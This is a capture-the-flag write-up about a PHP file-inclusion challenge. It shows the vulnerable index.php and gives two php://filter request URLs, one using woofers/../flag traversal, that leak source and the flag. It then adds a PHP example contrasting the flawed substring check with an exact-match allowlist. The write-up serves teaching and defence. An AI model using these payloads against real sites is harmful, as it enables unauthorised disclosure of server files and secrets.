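Challenge

The page takes a parameter here.

This is a file inclusion; use a PHP pseudo-protocol (stream wrapper) to read the flag.
First read index.php to see what it does:
/index.php?category=php://filter/read=convert.base64-encode/resource=index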

Decode the base64 output.

index.php source:
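```php
<?php
$file = $_GET['category'];
if(isset($file))
{
    // Substring checks only: the value just has to contain one of these words.
    // The "index" test has no "!== false", so it fails when "index" is at offset 0.
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        // User input is passed to include with ".php" appended.
        include ($file . '.php');
    }
    else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
```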
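The category value passed in must contain woofers, meowers, or index; only then is the file named by that value (with .php appended) included. We need to find a way to include flag.php.
Try reading it directly with /index.php?category=woofers/../flag: the value contains woofers, so it passes the check, and the path resolves to flag.php. Wrapping it in php://filter returns the source base64-encoded:
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag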

Decode the base64 output.

Got the flag:
flag{85254eba-a050-49cd-a3be-4e9859e51241}
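
The root cause is the substring check in index.php. The following is an added example, not part of the challenge's code: it runs that check next to an exact-match allowlist over the requests used above. The `resolve_page` function and the `woofers.php` / `meowers.php` paths are assumptions made for illustration.

```php
<?php
// Added example (not the challenge's code): the substring check from
// index.php compared with an exact-match allowlist.

// The check as it appears in index.php above (behaviour unchanged).
function substring_check(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");
}

// Hypothetical hardened resolver: the parameter only selects a key; the
// included path is a server-side constant, never built from user input,
// so wrappers (php://filter) and traversal (../) have nothing to act on.
function resolve_page(string $category): ?string
{
    $pages = [
        'woofers' => __DIR__ . '/woofers.php', // assumed file names
        'meowers' => __DIR__ . '/meowers.php',
    ];
    return $pages[$category] ?? null;
}

// Constructed inputs: the two legitimate values plus the two requests
// used in this writeup.
$inputs = [
    'woofers',
    'meowers',
    'php://filter/read=convert.base64-encode/resource=index',
    'php://filter/read=convert.base64-encode/resource=woofers/../flag',
];

foreach ($inputs as $in) {
    printf(
        "%-66s substring=%-6s allowlist=%s\n",
        $in,
        substring_check($in) ? 'pass' : 'reject',
        resolve_page($in) === null ? 'reject' : 'include'
    );
}
```

All four inputs pass the substring check, while the allowlist accepts only the two exact page names.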